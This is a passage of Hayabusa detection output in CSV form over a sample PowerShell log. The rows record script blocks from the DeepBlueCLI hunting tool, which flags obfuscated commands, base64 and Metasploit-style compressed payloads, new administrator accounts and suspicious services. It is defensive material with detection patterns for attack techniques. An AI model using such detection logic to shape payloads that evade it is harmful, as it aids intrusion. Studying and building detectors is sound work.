-gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.470 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.470 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.474 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.482 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.485 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:58:22.516 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:58:22.516 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:58:22.517 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:58:22.518 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:58:28.692 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:30.619 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.969 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:59:31.974 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ 